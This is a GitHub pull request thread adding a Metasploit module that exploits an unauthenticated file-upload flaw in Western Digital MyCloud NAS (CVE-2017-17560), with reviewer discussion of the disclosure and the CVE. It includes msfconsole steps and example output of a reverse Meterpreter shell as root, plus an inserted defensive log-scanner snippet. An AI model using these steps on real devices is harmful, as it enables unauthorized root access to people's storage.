Add wd_mycloud_multiupload_upload exploit #9248

Merged
merged 2 commits into from
Dec 14, 2017

Conversation

Zenofex (Contributor) commented Nov 28, 2017

This pull request adds a Western Digital MyCloud unauthenticated command execution exploit.

This module exploits a file upload vulnerability found in Western Digital's MyCloud NAS web administration HTTP service. The /web/jquery/uploader/multi_uploadify.php PHP script provides multipart upload functionality that is accessible without authentication and can be used to place a file anywhere on the device's file system. This allows an attacker the ability to upload a PHP shell onto the device and obtain arbitrary code execution as root.

This module was tested successfully on a MyCloud PR4100 with firmware version 2.30.172.

Verification

  • Start msfconsole
  • use exploit/linux/http/wd_mycloud_multiupload_upload
  • set RHOST [IP]
  • check
  • Verify device reported as vulnerable
  • run
  • Verify shell is spawned

Example Output

msf > use exploit/linux/http/wd_mycloud_multiupload_upload
msf exploit(wd_mycloud_multiupload_upload) > set RHOST 192.168.86.104
RHOST => 192.168.86.104
msf exploit(wd_mycloud_multiupload_upload) > check
[+] 192.168.86.104:80 The target is vulnerable.
msf exploit(wd_mycloud_multiupload_upload) > run

[*] Started reverse TCP handler on 192.168.86.215:4444 
[*] Uploading PHP payload (1124 bytes) to '/var/www'.
[+] Uploaded PHP payload successfully.
[*] Making request for '/.7bc5NqFMK5.php' to execute payload.
[*] Sending stage (37543 bytes) to 192.168.86.104
[*] Meterpreter session 1 opened (192.168.86.215:4444 -> 192.168.86.104:38086) at 2017-11-28 06:07:14 -0600
[+] Deleted .7bc5NqFMK5.php

meterpreter > getuid
Server username: root (0)
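The upload-then-execute sequence described in the PR text above (an unauthenticated POST to multi_uploadify.php, then a request for the dropped PHP file), seen from the defender's side as an added example that is not part of this PR or the Metasploit module: a small web access-log scanner that flags both steps. The log lines are constructed, and the hidden-dotfile heuristic is taken from the example output's '/.7bc5NqFMK5.php' naming, so it is an assumption about this module's behaviour rather than a general rule.

```python
"""Access-log scanner for the MyCloud multi_uploadify.php upload-then-execute
pattern. Added example for this thread, not part of the Metasploit module;
the log lines below are constructed, not captured from a device."""
import re
# Unauthenticated uploader path named in the PR description.
UPLOADER = "/web/jquery/uploader/multi_uploadify.php"
# Heuristic taken from the example output: the module requests a hidden PHP
# file in the web root ('/.7bc5NqFMK5.php'). Other payload names will not match.
HIDDEN_PHP = re.compile(r"^/\.[A-Za-z0-9]+\.php$")
# Combined log format as written by Apache/nginx by default.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def parse(line):
    """Fields of one combined-format log line as a dict, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["path"] = ev["path"].split("?", 1)[0]  # ignore any query string
    return ev

def find_suspicious(lines):
    """Return (client_ip, finding) tuples in log order.
    Every POST to the uploader is reported: the endpoint needs no authentication,
    so even a legitimate-looking upload deserves review. A GET for a hidden .php
    file is the execute step; it is tagged by whether the client uploaded first."""
    uploaders, findings = set(), []
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        if ev["method"] == "POST" and ev["path"] == UPLOADER:
            uploaders.add(ev["ip"])
            findings.append((ev["ip"], "POST to unauthenticated uploader"))
        elif ev["method"] == "GET" and HIDDEN_PHP.match(ev["path"]):
            why = ("hidden .php requested after upload" if ev["ip"] in uploaders
                   else "hidden .php requested, no prior upload seen")
            findings.append((ev["ip"], why))
    return findings

# Constructed sample: one ordinary page load, then the two-step pattern.
SAMPLE_LOG = [
    '203.0.113.9 - - [28/Nov/2017:06:05:01 -0600] "GET /web/index.php HTTP/1.1" 200 5123',
    '198.51.100.7 - - [28/Nov/2017:06:07:10 -0600] "POST /web/jquery/uploader/multi_uploadify.php HTTP/1.1" 200 84',
    '198.51.100.7 - - [28/Nov/2017:06:07:12 -0600] "GET /.7bc5NqFMK5.php HTTP/1.1" 200 0',
]
```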

@bcoles bcoles self-requested a review November 28, 2017 13:37
bcoles (Contributor) commented Nov 28, 2017

Thanks @Zenofex

Please send a PCAP to msfdev [at] metasploit.com

@bcoles bcoles added the module label Nov 28, 2017
],
'References' =>
[
['URL', 'https://www.exploitee.rs/index.php/Western_Digital_MyCloud'],
And if this is the first place the vuln has been properly documented, feel free to add a link to this PR:

#9248

If it's described in a published DEFCON talk, a link to that presentation or paper would be super handy, too.

todb-r7 commented Nov 29, 2017

So there's no CVE or BID or any other kind of reference number or name on this module. I'm pretty sure I recall you mentioning that you already disclosed to the vendor before DEFCON -- did they assign a ticket number or anything? I just would like to follow up with them and ask if they'd like us to assign a CVE for this.

Zenofex (Contributor, Author) commented Nov 29, 2017

Hey todb,

We disclosed to the vendor at DEFCON 25 and in the weeks after over email but they have been unresponsive. We do not have a CVE but are happy to do whatever you think is appropriate. I can add a link to the presentation slides and/or video as well, how would you like me to proceed?

wwebb-r7 (Contributor) commented
@Zenofex regardless of whatever you and @todb decide on the lack of CVE, it would be helpful to go ahead and link any presentation or video you have in the references.

todb-r7 commented Nov 29, 2017

Yep, a link to the presentation material in the References would be super helpful.

I'll bug them and see if I can't get a response myself. Thanks, @Zenofex !

@busterb busterb self-assigned this Nov 30, 2017
busterb (Contributor) commented Nov 30, 2017

Verified pcap, this looks good. Thanks @Zenofex

Zenofex (Contributor, Author) commented Nov 30, 2017

Added the requested additional reference URLs. todb, let me know if anything is needed from me for the CVEs.

todb-r7 commented Dec 8, 2017

Welp, it's been 9 days and I haven't heard anything back -- and according to our CNA agreement, we shan't be assigning a CVE unless the vendor acknowledges.

So, the lack of CVE shouldn't hold anything up, since we have decent secondary references. I'll bug CERT/CC and see if they can toss one our way. If so, I'll add it post-facto.

todb-r7 commented Dec 8, 2017

Reported to CERT/CC, they have a tracking number VRF#17-12-JQCYD for it now.

todb-r7 commented Dec 12, 2017

CVE Request 432582 for CVE ID filed. Because Western Digital has failed to acknowledge this vulnerability (despite the overwhelming evidence that it exists), Rapid7 is unable to assign a CVE ourselves. We've sent the request up to MITRE who can assign out of their block (we used to get these out of CERT/CC, but apparently that's not how it works anymore, which is fine).

todb-r7 commented Dec 12, 2017

CVE-2017-17560 has been allocated for this.

I think we're good to land this, right @bcoles ? I can either ninja-edit the references to include this on merging, or you can.

bcoles (Contributor) commented Dec 13, 2017

@todb-r7 +1 looks good to me

@busterb busterb merged commit 1ced399 into rapid7:master Dec 14, 2017
busterb (Contributor) commented Dec 14, 2017

Added CVE reference and landed 125a079 - thanks!

busterb (Contributor) commented Dec 14, 2017

Release Notes

This adds a Western Digital MyCloud unauthenticated command execution exploit, CVE-2017-17560.

Zenofex (Contributor, Author) commented Dec 14, 2017

Woohoo, thanks everyone!

6 participants